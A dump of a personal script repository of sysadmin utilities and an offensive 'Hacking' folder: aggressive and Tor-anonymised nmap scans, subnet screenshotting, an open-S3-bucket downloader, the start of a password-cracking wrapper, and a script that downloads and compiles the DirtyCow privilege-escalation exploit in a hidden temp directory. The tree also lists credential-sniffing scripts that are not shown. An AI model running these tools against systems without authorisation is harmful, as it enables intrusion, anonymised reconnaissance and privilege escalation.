├── .update_README.md.sh ├── Databases └── mysql_trace_changes_example.sql ├── Graphical_Environments ├── firefox_history_stats.sh ├── record_screen.sh └── set_gnome-shell_theme.sh ├── Hacking ├── Info_Gathering │ ├── nmap_amap_identify.sh │ ├── nmap_deep.sh │ ├── nmap_html_report.sh │ ├── nmap_light.sh │ ├── nmap_with_tor.sh │ └── zmap_screenshot.sh ├── Misc │ ├── S3obd.py │ └── dirtycow_centos.sh ├── Password_Cracking │ ├── autojohn.sh │ ├── dict_split_n_sort.sh │ ├── htmltable2csv.py │ ├── pwd_sucker_crackpot.sh │ ├── pwd_sucker_gromweb.sh │ ├── pwd_sucker_hashkiller.sh │ └── pwd_sucker_md5db.sh ├── Penetration_Testing │ ├── find_reflected_xss.sh │ ├── sniff_host_traffic.sh │ ├── sniff_passwords_tcpdump.sh │ └── sniff_ssh_credentials.sh └── snippets.txt ├── LICENSE ├── Media ├── aspectpad ├── image_orientation.sh └── snippets.txt ├── Networking ├── get_nics_with_ip_mac_status.sh ├── get_nics_with_ip_mac_status_freebsd.sh ├── list_public_open_ports.sh ├── ping_until_alive.sh ├── reverse_ip_lookup.sh ├── snippets.txt ├── ssh_proxy_pivot.sh ├── ssh_socks5_proxy_remote_host.sh └── tor_check.sh ├── README.md ├── System_Administration ├── Clusters │ └── RedHat_HA_Cluster │ │ ├── cluster_info.sh │ │ ├── cluster_logs.sh │ │ ├── cluster_rrp_tcpdump.sh │ │ ├── cluster_running_resource_groups.sh │ │ ├── cluster_status.sh │ │ └── prompt.sh ├── Virtualization │ └── proxmox_import_ova.sh ├── fix_locales.sh ├── mount_smb_shares_with_auth.sh ├── pip_upgrade_pkgs.sh ├── prepare_kali.sh ├── quick_backup.sh └── snippets.txt ├── Utilities ├── NessusToExcel.py ├── free_buffer_cache.sh ├── git_list_repos.sh ├── git_update_repos.sh ├── greenpass_qr_decoder.sh ├── magnet2torrent.sh ├── mysql2csv.sh ├── nessus_massive_export.sh ├── send_sms.sh ├── share_dir_via_rdp.sh ├── shrinkpdf.sh ├── snippets.txt └── xfce4-root-terminal.sh ├── Web ├── SharePwd.py ├── extract_links.sh └── share_file.sh └── config_files ├── .bashrc ├── .bashrc_freebsd ├── .config └── sublime-text-3 │ └── Packages │ └── User │ └── Preferences.sublime-settings ├── .gcm └── gcm.conf ├── .nanorc ├── .ssh └── config ├── .tmux.conf ├── .vimrc ├── .xinitrc └── .xprofile /.update_README.md.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | README=README.md 4 | 5 | { 6 | echo '# Scripts' 7 | echo 'A collection of personal useful scripts (in Bash and Python) for Unix and GNU/Linux systems.' 8 | echo '```' 9 | find ./ -type f \( -iname \*.sh -o -iname \*.txt -o -iname \*.py -o -iname \*.sql \) | grep -v update_README.md.sh | sort 10 | echo '```' 11 | } > $README 12 | 13 | -------------------------------------------------------------------------------- /Databases/mysql_trace_changes_example.sql: -------------------------------------------------------------------------------- 1 | /* 2 | just a stupid didactic example where INSERT/UPDATE operations on a table are 3 | logged in another table (= poor man's auditing system LOL!) 
4 | */ 5 | 6 | CREATE TABLE person (name VARCHAR(20), age TINYINT(4), sex CHAR(1)); 7 | CREATE TABLE changes (date TIMESTAMP, tb VARCHAR(255), action VARCHAR(255), msg VARCHAR(255)); 8 | 9 | DELIMITER $$ 10 | CREATE PROCEDURE save_change_person(p1 VARCHAR(255), p2 TINYINT(4), p3 CHAR(1), act VARCHAR(255)) 11 | BEGIN DECLARE msg CHAR(255); 12 | SET msg = CONCAT('Changes: ', p1, ',', p2, ',', p3); 13 | INSERT INTO changes VALUES (NOW(), 'person', act, msg); 14 | END $$; 15 | 16 | CREATE TRIGGER t_save_change_person_insert AFTER INSERT ON person FOR EACH ROW CALL save_change_person(NEW.name, NEW.age, NEW.sex, 'INSERT'); 17 | CREATE TRIGGER t_save_change_person_update AFTER UPDATE ON person FOR EACH ROW CALL save_change_person(NEW.name, NEW.age, NEW.sex, 'UPDATE'); 18 | -------------------------------------------------------------------------------- /Graphical_Environments/firefox_history_stats.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: firefox_history_stats.sh 6 | # 7 | # Description: A script that gathers some statistics from your Firefox history. 8 | # It uses sqlite3 to parse user's Firefox history database and get 9 | # the last three months, then it removes all the IP addresses and 10 | # port numbers and finally sorts and counts them. 11 | # 12 | # Usage: ./firefox_history_stats.sh 13 | # 14 | # 15 | # --TODO-- 16 | # - ??? 17 | # 18 | # 19 | ################################################################################ 20 | 21 | 22 | # MAIN ------------------------------------------------------------------------- 23 | 24 | OUT=$(mktemp -d -q) 25 | 26 | cp $(find "${HOME}/.mozilla/firefox/" -name "places.sqlite" | head -n 1) "${OUT}/places.sqlite" 27 | sqlite3 "${OUT}/places.sqlite" "SELECT url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id and visit_date > strftime('%s','now','-3 month')*1000000 ORDER by visit_date;" > "${OUT}/urls-unsorted" 28 | sort -u "${OUT}/urls-unsorted" > "${OUT}/urls" 29 | awk -F'/' '{print $3}' "${OUT}/urls" | grep -v -E -e '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' -e ':.*' -e '^$' | sed -e 's/www\.//g' | sort | uniq -c | sort -n 30 | 31 | rm -rf ${OUT} 32 | 33 | -------------------------------------------------------------------------------- /Graphical_Environments/record_screen.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: record_screen.sh [-f FRAMES_PER_SECOND] [-o OUTPUT_FILE] 6 | # 7 | # Description: A script that records a screencast and saves it to a file. 8 | # Press CTRL+C to stop recording. 9 | # 10 | # Usage: ./record_screen.sh [-f FRAMES_PER_SECOND] [-o OUTPUT_FILE] 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 
15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # FUNCTIONS -------------------------------------------------------------------- 21 | 22 | command_exists() { 23 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 24 | } 25 | 26 | usage() { 27 | echo "Usage: $0 [-f FRAMES_PER_SECOND] [-o OUTPUT_FILE]" 1>&2 ; exit 1 ; 28 | } 29 | 30 | 31 | # CHECKS ----------------------------------------------------------------------- 32 | 33 | declare -a CMDS=( 34 | "ffmpeg" 35 | ); 36 | 37 | for CMD in ${CMDS[@]} ; do 38 | command_exists $CMD 39 | done 40 | 41 | while getopts ":f:o:" OPTS ; do 42 | case "${OPTS}" in 43 | f) 44 | FRAMES_PER_SECOND=${OPTARG} 45 | ;; 46 | o) 47 | OUTPUT_FILE=${OPTARG} 48 | ;; 49 | *) 50 | usage 51 | ;; 52 | esac 53 | done 54 | shift $((OPTIND-1)) 55 | 56 | if [[ -z "${FRAMES_PER_SECOND}" || -z "${OUTPUT_FILE}" ]] ; then 57 | usage 58 | fi 59 | 60 | 61 | # MAIN ------------------------------------------------------------------------- 62 | 63 | if [[ -z ${DISPLAY} ]] ; then 64 | echo "DISPLAY variable is not set. Please make sure you are running in a graphical environment." 65 | 66 | exit 1 67 | fi 68 | 69 | ffmpeg -f x11grab -s wxga -r ${FRAMES_PER_SECOND} -i ${DISPLAY} -qscale 0 ${OUTPUT_FILE} 70 | 71 | -------------------------------------------------------------------------------- /Graphical_Environments/set_gnome-shell_theme.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: set_gnome-shell_theme.sh 6 | # 7 | # Description: A script that sets a Gnome-Shell theme via command line. 8 | # 9 | # Usage: ./set_gnome-shell_theme.sh [-l | ] 10 | # 11 | # 12 | # --TODO-- 13 | # - Check themes names 14 | # - List only valid Gnome-Shell themes 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # FUNCTIONS -------------------------------------------------------------------- 22 | 23 | command_exists() { 24 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 25 | } 26 | 27 | 28 | # CHECKS ----------------------------------------------------------------------- 29 | 30 | declare -a CMDS=( 31 | "gsettings" 32 | ); 33 | 34 | for CMD in ${CMDS[@]} ; do 35 | command_exists $CMD 36 | done 37 | 38 | 39 | # MAIN ------------------------------------------------------------------------- 40 | 41 | OPTION=$1 42 | THIS=$(basename "$0") 43 | 44 | if [[ -z "$OPTION" ]] ; then 45 | echo "Usage: $THIS [-l | ]" 46 | echo 47 | echo " -l | --list - List all the available themes" 48 | echo " - Name of the theme to be set" 49 | 50 | exit 1 51 | fi 52 | 53 | if [[ "$OPTION" == "-l" || "$OPTION" == "--list" ]] ; then 54 | ls -A1 /usr/share/themes/ 55 | else 56 | echo "Setting Gnome-Shell theme \""$OPTION"\"..." 
57 | 58 | gsettings set org.gnome.desktop.interface gtk-theme \""$OPTION"\" 59 | gsettings set org.gnome.desktop.wm.preferences theme \""$OPTION"\" 60 | gsettings set org.gnome.shell.extensions.user-theme name \""$OPTION"\" 61 | fi 62 | 63 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_amap_identify.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_amap_identify.sh 6 | # 7 | # Description: A script that tries to discover the real services running behind 8 | # the open ports on a target host. 9 | # 10 | # Usage: ./nmap_amap_identify.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # FUNCTIONS -------------------------------------------------------------------- 21 | 22 | command_exists() { 23 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 24 | } 25 | 26 | 27 | # CHECKS ----------------------------------------------------------------------- 28 | 29 | if [[ $EUID -ne 0 ]] ; then 30 | echo "This script must be run as root!" 1>&2 31 | 32 | exit 1 33 | fi 34 | 35 | declare -a CMDS=( 36 | "amap" 37 | "nmap" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | 45 | # MAIN ------------------------------------------------------------------------- 46 | 47 | IP=$1 48 | TMPFILE=$(mktemp -q) 49 | 50 | nmap -sS -v -O --open ${IP} -oG ${TMPFILE} &>/dev/null 51 | 52 | cat ${TMPFILE} | grep 'Ports:' | cut -d':' -f3 | sed -e 's/, /\n/g' | grep open | cut -d'/' -f1 53 | 54 | for PORT in $(cat ${TMPFILE} | grep 'Ports:' | cut -d':' -f3 | sed -e 's/, /\n/g' | grep open | cut -d'/' -f1) ; do 55 | amap -q -U ${IP} ${PORT} | grep matches 56 | done 57 | 58 | rm -f ${TMPFILE} 59 | 60 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_deep.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_deep.sh 6 | # 7 | # Description: A script that performs a deep, complete and aggressive NMAP scan. 8 | # 9 | # Usage: ./nmap_deep.sh 10 | # 11 | # 12 | # --TODO-- 13 | # - ??? 14 | # 15 | # 16 | ################################################################################ 17 | 18 | 19 | # VARIABLES -------------------------------------------------------------------- 20 | 21 | TARGET=$1 22 | 23 | 24 | # FUNCTIONS -------------------------------------------------------------------- 25 | 26 | command_exists() { 27 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 28 | } 29 | 30 | 31 | # CHECKS ----------------------------------------------------------------------- 32 | 33 | if [[ $EUID -ne 0 ]] ; then 34 | echo "This script must be run as root!" 1>&2 35 | 36 | exit 1 37 | fi 38 | 39 | declare -a CMDS=( 40 | "nmap" 41 | ); 42 | 43 | for CMD in ${CMDS[@]} ; do 44 | command_exists $CMD 45 | done 46 | 47 | 48 | # MAIN ------------------------------------------------------------------------- 49 | 50 | if [[ ! -z $TARGET ]] ; then 51 | nmap -vv -Pn -sS -A -sC -p- -T 3 -script-args=unsafe=1 -n ${TARGET} 52 | else 53 | >&2 echo "Error! not specified." 
54 | echo "Usage: ./$(basename $BASH_SOURCE) " 55 | fi 56 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_html_report.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_html_report.sh 6 | # 7 | # Description: A script that runs a full and exhaustive scan against one or 8 | # more targets, and then creates a nice HTML report using a modern 9 | # XSL style. 10 | # 11 | # Usage: ./nmap_html_report.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # FUNCTIONS -------------------------------------------------------------------- 22 | 23 | command_exists() { 24 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 25 | } 26 | 27 | 28 | # CHECKS ----------------------------------------------------------------------- 29 | 30 | if [[ $EUID -ne 0 ]] ; then 31 | echo "This script must be run as root!" 1>&2 32 | 33 | exit 1 34 | fi 35 | 36 | declare -a CMDS=( 37 | "nmap" 38 | "curl" 39 | "xsltproc" 40 | ); 41 | 42 | for CMD in ${CMDS[@]} ; do 43 | command_exists $CMD 44 | done 45 | 46 | 47 | # MAIN ------------------------------------------------------------------------- 48 | 49 | TARGET=$1 50 | SCANNAME="nmap_advanced_portscan" 51 | 52 | # check if TARGET is a file (with the list of targets), or just a single host/subnet 53 | if [ -e $TARGET ]; then 54 | nmap -sS -sV --script=default,version,vuln,ssl-enum-ciphers,ssh-auth-methods,ssh2-enum-algos -Pn --open --min-hostgroup 256 --min-rate 5000 --max-retries 3 --script-timeout 300 -d -oA nmap_advanced_portscan -vvv -iL $TARGET 55 | else 56 | nmap -sS -sV --script=default,version,vuln,ssl-enum-ciphers,ssh-auth-methods,ssh2-enum-algos -Pn --open --min-hostgroup 256 --min-rate 5000 --max-retries 3 --script-timeout 300 -d -oA nmap_advanced_portscan -vvv $TARGET 57 | fi 58 | 59 | # download the XSL style 60 | curl https://raw.githubusercontent.com/Haxxnet/nmap-bootstrap-xsl/main/nmap-bootstrap.xsl -o style.xsl 61 | 62 | # apply the XSL style to the XML to obtain the final HTML report 63 | xsltproc -o $SCANNAME.html style.xsl $SCANNAME.xml 64 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_light.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_light.sh 6 | # 7 | # Description: A script that performs a light scan againt a subnet considering 8 | # the open ports only, then saves the output in a greppable text 9 | # file. 10 | # 11 | # Usage: ./nmap_light.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | SUBNET=$1 24 | 25 | 26 | # FUNCTIONS -------------------------------------------------------------------- 27 | 28 | command_exists() { 29 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | if [[ $EUID -ne 0 ]] ; then 36 | echo "This script must be run as root!" 
1>&2 37 | 38 | exit 1 39 | fi 40 | 41 | declare -a CMDS=( 42 | "nmap" 43 | ); 44 | 45 | for CMD in ${CMDS[@]} ; do 46 | command_exists $CMD 47 | done 48 | 49 | 50 | # MAIN ------------------------------------------------------------------------- 51 | 52 | if [[ ! -z $SUBNET ]] ; then 53 | OUTFILE=$(echo "nmap_$SUBNET.txt" | tr '/' '_') 54 | 55 | nmap -sS -v -O --open -oG ${OUTFILE} ${SUBNET} 56 | else 57 | >&2 echo "Error! not specified." 58 | echo "Usage: ./$(basename $BASH_SOURCE) " 59 | fi 60 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_with_tor.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_with_tor.sh 6 | # 7 | # Description: A script that lets users run full TCP port scans with NMap 8 | # anonymously through the TOR network. TOR and ProxyChains must be 9 | # installed and configured, and the TOR daemon must be running. 10 | # 11 | # Usage: ./nmap_with_tor.sh 12 | # ( can be an IP address or a FQDN; in the second case, 13 | # the domain name is securely resolved using tor-resolve) 14 | # 15 | # Notes: Please make sure that your TOR configuration file has the 16 | # following lines: 17 | # 18 | # SOCKSPort 9050 19 | # AutomapHostsOnResolve 1 20 | # DNSPort 53530 21 | # TransPort 9040 22 | # 23 | # and that your ProxyChains configuration file has the following 24 | # lines: 25 | # 26 | # dynamic_chain 27 | # proxy_dns 28 | # tcp_read_time_out 15000 29 | # tcp_connect_time_out 8000 30 | # [ProxyList] 31 | # socks5 127.0.0.1 9050 32 | # 33 | # 34 | # --TODO-- 35 | # - ??? 36 | # 37 | # 38 | ################################################################################ 39 | 40 | 41 | # FUNCTIONS -------------------------------------------------------------------- 42 | 43 | command_exists() { 44 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 45 | } 46 | 47 | valid_ip() 48 | { 49 | local ip=$1 50 | local stat=1 51 | 52 | if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] ; then 53 | OIFS=$IFS 54 | IFS='.' 55 | ip=($ip) 56 | IFS=$OIFS 57 | [[ ${ip[0]} -le 255 && ${ip[1]} -le 255 && ${ip[2]} -le 255 && ${ip[3]} -le 255 ]] 58 | stat=$? 59 | fi 60 | 61 | return $stat 62 | } 63 | 64 | 65 | # CHECKS ----------------------------------------------------------------------- 66 | 67 | declare -a CMDS=( 68 | "nmap" 69 | "proxychains" 70 | "tor" 71 | "tor-resolve" 72 | ); 73 | 74 | for CMD in ${CMDS[@]} ; do 75 | command_exists $CMD 76 | done 77 | 78 | 79 | # MAIN ------------------------------------------------------------------------- 80 | 81 | TARGET=$1 82 | SOCKSPORT=9050 83 | OUT="/tmp/${TARGET}.out" 84 | 85 | if [[ ! -z ${TARGET} ]] ; then 86 | 87 | if valid_ip ${TARGET} ; then 88 | : 89 | else 90 | TARGET=$(tor-resolve ${TARGET} 127.0.0.1:${SOCKSPORT}) 91 | fi 92 | 93 | #proxychains nmap -4 -sT -Pn -n -vv --open -oG ${OUT} ${TARGET} 94 | proxychains nmap -4 -F -sT -Pn -n -v --open -oG ${OUT} ${TARGET} 95 | else 96 | >&2 echo "Error! not specified." 
97 | echo "Usage: ./$(basename $BASH_SOURCE) " 98 | fi 99 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/zmap_screenshot.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: zmap_screenshot.sh 6 | # 7 | # Description: A script that takes screenshots of all the websites belonging to 8 | # a whole subnet. 9 | # 10 | # Usage: ./zmap_screenshot.sh [] 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # FUNCTIONS -------------------------------------------------------------------- 21 | 22 | command_exists() { 23 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 24 | } 25 | 26 | 27 | # CHECKS ----------------------------------------------------------------------- 28 | 29 | declare -a CMDS=( 30 | "amap" 31 | "cutycapt" 32 | "host" 33 | "ipcalc" 34 | "whois" 35 | "zmap" 36 | ); 37 | 38 | for CMD in ${CMDS[@]} ; do 39 | command_exists $CMD 40 | done 41 | 42 | 43 | # MAIN ------------------------------------------------------------------------- 44 | 45 | TARGET=$1 46 | PORT=$2 47 | THIS=$(basename "$0") 48 | 49 | if [[ -z "$TARGET" ]] ; then 50 | # echo "Usage: $THIS [] []" 51 | echo "Usage: $THIS []" 52 | echo 53 | echo " - Initial host (eg: scanme.nmap.org)" 54 | echo " - Port to check (default: 80)" 55 | # echo " - Directory where screnshot are saved (default: /tmp/shots)" 56 | 57 | exit 1 58 | fi 59 | 60 | echo "Initial target: $TARGET" 61 | 62 | if [[ -z "$PORT" ]] ; then 63 | PORT=80 64 | 65 | echo "Port: $PORT (default)" 66 | else 67 | echo "Port: $PORT" 68 | fi 69 | 70 | IP=$(host $TARGET | grep 'has address' | grep -v 'IPv6' | grep -v 'NXDOMAIN' | awk '{print $NF}' | head -1) 71 | 72 | if [[ -z "$IP" ]] ; then 73 | echo "Wrong target format or target not resolvable." 74 | 75 | exit 1 76 | fi 77 | 78 | OUT_DIR="/tmp/shots_${TARGET}" 79 | mkdir $OUT_DIR 80 | 81 | echo "Target's IP address: $IP" 82 | 83 | RANGE=$(whois $IP | egrep 'inetnum:|NetRange:' | head -1 | cut -d':' -f2 | xargs | tr -d ' ') 84 | 85 | echo "IP addresses range: $RANGE" 86 | 87 | #NETWORK=$(ipcalc "$RANGE" | tail -1) 88 | NETWORK=$(ipcalc "$RANGE" | grep -v deaggregate | head -1) 89 | 90 | echo "Range network: $NETWORK" 91 | 92 | FILENAME="${TARGET}_$(echo "$NETWORK" | sed -e 's/\//_/g').txt" 93 | 94 | sudo zmap -p $PORT -o $FILENAME -q --disable-syslog "${NETWORK}" 95 | 96 | echo "Discovered IPs file: $FILENAME" 97 | echo "Discovered hosts: $(cat $FILENAME | wc -l)" 98 | 99 | for IP in $(cat $FILENAME) ; do 100 | TEST_HTTPS=$(amap -1 -q $IP $PORT | grep 'matches ssl') 101 | TEST_HTTPS=$? 102 | TEST_HTTP=$(amap -1 -q $IP $PORT | grep 'matches http') 103 | TEST_HTTP=$? 
104 | 105 | if [[ $TEST_HTTPS -eq 0 && $TEST_HTTP -ne 0 ]] ; then # HTTPS 106 | PROTOCOL="https" 107 | elif [[ $TEST_HTTP -eq 0 && $TEST_HTTPS -ne 0 ]] ; then # HTTP 108 | PROTOCOL="http" 109 | elif [[ $TEST_HTTP -eq 0 && $TEST_HTTPS -eq 0 ]] ; then # probably HTTPS 110 | PROTOCOL="https" 111 | else 112 | echo "Skipping host $IP (unknown protocol for port $PORT)" 113 | 114 | continue 115 | fi 116 | 117 | echo "Saving screenshot for site: $PROTOCOL://$IP:$PORT" 118 | 119 | cutycapt --insecure --out=$OUT_DIR/$IP.jpg --smooth --private-browsing=on --max-wait=5000 --url="$PROTOCOL://$IP:$PORT" 2> /dev/null 120 | done 121 | -------------------------------------------------------------------------------- /Hacking/Misc/S3obd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # S3obd.py 4 | # ----------- 5 | # A simple Python script that can download files from an open AWS S3 bucket. 6 | # 7 | # Coded by: Riccardo Mollo (riccardomollo84@gmail.com) 8 | # 9 | 10 | import argparse 11 | import os 12 | import requests 13 | import xml.etree.ElementTree as ET 14 | 15 | 16 | def check_directory(directory_path): 17 | if not os.path.exists(directory_path): 18 | try: 19 | os.makedirs(directory_path) 20 | print(f"Directory '{directory_path}' created successfully.") 21 | except OSError as e: 22 | print(f"Error: Unable to create directory '{directory_path}': {e}") 23 | return False 24 | 25 | if os.access(directory_path, os.W_OK) and os.access(directory_path, os.R_OK): 26 | print(f"Directory '{directory_path}' is writable and readable.") 27 | return True 28 | else: 29 | print(f"Error: Directory '{directory_path}' is not writable or readable.") 30 | return False 31 | 32 | 33 | def download_file(url, folder_path, file_name): 34 | file_path = os.path.join(folder_path, file_name) 35 | 36 | response = requests.get(url) 37 | 38 | if response.status_code == 200: 39 | with open(file_path, "wb") as file: 40 | file.write(response.content) 41 | print(f"File downloaded and saved at: {file_path}") 42 | else: 43 | print( 44 | f"Error: Unable to download file from {url}. Status code: {response.status_code}" 45 | ) 46 | 47 | 48 | parser = argparse.ArgumentParser(prog="S3obd.py") 49 | parser.add_argument("-u", "--url", help="URL of the open AWS S3 bucket", required=True) 50 | parser.add_argument( 51 | "-d", "--directory", help="output directory to save files into", required=True 52 | ) 53 | args = parser.parse_args() 54 | url = args.url 55 | directory = args.directory 56 | 57 | if not check_directory(directory): 58 | exit(0) 59 | 60 | if not url.endswith("/"): 61 | url += "/" 62 | 63 | response = requests.get(url) 64 | 65 | if response.status_code == 200: 66 | xml_content = response.text 67 | 68 | root = ET.fromstring(xml_content) 69 | namespace = {"ns": "http://s3.amazonaws.com/doc/2006-03-01/"} 70 | 71 | keys = [ 72 | content.find("ns:Key", namespace).text 73 | for content in root.findall(".//ns:Contents", namespace) 74 | ] 75 | 76 | for key in keys: 77 | download_file(url + key, directory, key) 78 | else: 79 | print( 80 | f"Error: Unable to fetch content from {url}. 
Status code: {response.status_code}" 81 | ) 82 | -------------------------------------------------------------------------------- /Hacking/Misc/dirtycow_centos.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # this script is useful to compile the FireFart DirtyCow exploit on a CentOS 7.X machine which doesn't have a C compiler 4 | 5 | DIR=/tmp/.exploits 6 | 7 | mkdir -p ${DIR} 8 | cd ${DIR} 9 | 10 | # download FireFart DirtyCow exploit's C source code 11 | wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c 12 | 13 | # download RPMs for CentoOS 7.X with all the necessary tools to compile the exploit 14 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/compat-gcc-44-4.4.7-8.el7.x86_64.rpm 15 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/cpp-4.8.5-44.el7.x86_64.rpm 16 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/gcc-4.8.5-44.el7.x86_64.rpm 17 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-2.17-317.el7.x86_64.rpm 18 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-common-2.17-317.el7.x86_64.rpm 19 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-devel-2.17-317.el7.x86_64.rpm 20 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-headers-2.17-317.el7.x86_64.rpm 21 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-static-2.17-317.el7.x86_64.rpm 22 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-utils-2.17-317.el7.x86_64.rpm 23 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/libmpc-1.0.1-3.el7.x86_64.rpm 24 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/libmpc-devel-1.0.1-3.el7.x86_64.rpm 25 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/mpfr-3.1.1-4.el7.x86_64.rpm 26 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/mpfr-devel-3.1.1-4.el7.x86_64.rpm 27 | 28 | # explode the RPMs 29 | for pkg in *.rpm ; do 30 | rpm2cpio $pkg | cpio -idmv 31 | done 32 | 33 | # update the environment variables 34 | export PATH=${DIR}/sbin:${DIR}/usr/bin:${DIR}/usr/sbin:$PATH 35 | export LD_LIBRARY_PATH=${DIR}/usr/lib64:${DIR}/lib64:$LD_LIBRARY_PATH 36 | export LIBRARY_PATH=${DIR}/usr/lib64:${DIR}/lib64:$LD_LIBRARY_PATH 37 | export CPATH=${DIR}/usr/include 38 | 39 | ldconfig -v -f ${DIR}/etc/ld.so.conf -C ${DIR}/etc/ld.so.cache 40 | 41 | gcc -I ${DIR}/usr/include -pthread dirty.c -o dirty -lcrypt 42 | -------------------------------------------------------------------------------- /Hacking/Password_Cracking/autojohn.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: autojohn.sh 6 | # 7 | # Description: A script that is meant to simplify and automate the usage of the 8 | # powerful JohnTheRipper password cracking tool. 9 | # At the moment, it is solely intended for dictionary attacks. 
10 | # 11 | # Usage: ./autojohn.sh --help|-h 12 | # ./autojohn.sh 13 | # ./autojohn.sh [] 14 | # ./autojohn.sh --info 15 | # ./autojohn.sh --sessions 16 | # ./autojohn.sh --show 17 | # ./autojohn.sh --rules 18 | # ./autojohn.sh --polish 19 | # ./autojohn.sh --clean 20 | # 21 | # 22 | # --TODO-- 23 | # - improve and optimize code 24 | # - implement simple bruteforce: 25 | # john test.txt --format=Raw-MD5 -1=?l -mask=?1?1?1?1?1?1?1 --fork=4 26 | # ./autojohn.sh --bruteforce --min --max 8 --mask 27 | # 28 | # 29 | ################################################################################ 30 | 31 | 32 | # VARIABLES -------------------------------------------------------------------- 33 | 34 | DICT_DIR=~/DICTIONARIES # each dictionary/wordlist in this directory *MUST* be a plain text ".txt" file 35 | POTS_DIR=~/.autojohn # here you will find the cracked passwords from each session 36 | 37 | 38 | # OTHER VARIABLES (don't touch them!) ------------------------------------------ 39 | 40 | OS=$(uname -s) 41 | 42 | if [[ $OS == "Linux" ]] ; then 43 | DU_A_PARAM='--apparent-size' 44 | CORES=$(grep -c ^processor /proc/cpuinfo) 45 | elif [[ $OS == "FreeBSD" ]] ; then 46 | DU_A_PARAM='-A' 47 | CORES=$(sysctl -n hw.ncpu) 48 | else 49 | DU_A_PARAM='' 50 | CORES=1 51 | fi 52 | 53 | 54 | # FUNCTIONS -------------------------------------------------------------------- 55 | 56 | command_exists() { 57 | command -v "$1" > /dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 58 | } 